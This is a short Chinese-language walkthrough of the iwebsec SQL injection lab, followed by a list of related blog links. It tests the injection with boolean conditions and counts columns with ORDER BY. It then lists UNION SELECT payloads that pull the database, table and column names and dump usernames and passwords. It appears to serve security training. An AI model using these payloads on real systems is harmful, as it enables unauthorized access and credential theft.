iwebsec-SQL数字型注入

1.判断是否存在漏洞

添加and 1=1发现正常显示,添加and 1=2无回显条目,则存在sql注入漏洞

2.因为有回显,尝试union联合注入,使用order by判断出有3个字段

3.使用union联合注入查看回显位,发现3三个字段均有回显,任意使用字段注入即可

4.获取数据库名

复制代码
?id=-1 union select database(),2,3

5.获取表名,这时候发现如果使用1和2回显位会显示报错,那么可以使用3回显位回显

复制代码
?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()

6.猜测用户可能存在user或users表中,先使用user表查看字段

复制代码
?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name="user"

7.查看id=1的username和password

这里应该不是user表,真是用户存在users表,将表名改为users一样

复制代码
?id=-1 union select 1,2,group_concat(username,',',password) from user where id=1
相关推荐
qq_3404740231 分钟前
3.0 labview使用SQLServer
数据库·sqlserver·labview
武昌库里写JAVA1 小时前
Java设计模式之工厂模式
java·vue.js·spring boot·后端·sql
靡樊1 小时前
MySQL:C语言链接
数据库·mysql
gopher95113 小时前
go中的Ticker
数据库·golang
熏鱼的小迷弟Liu3 小时前
【MySQL】一篇讲透MySQL的MVCC机制!
数据库·mysql
key065 小时前
网络安全等级保护测评实施过程
数据库·安全·web安全·安全合规
程序猿阿伟5 小时前
《政企API网关:安全与性能平衡的转型实践》
网络·数据库·安全
muren6 小时前
Qt DuckDB SQL 驱动插件
数据库
一匹电信狗6 小时前
【MySQL】数据库基础
linux·运维·服务器·数据库·mysql·ubuntu·小程序
LoneEon7 小时前
Ubuntu 部署 ClickHouse:高性能分析型数据库(附shell脚本一键部署↓)
数据库·clickhouse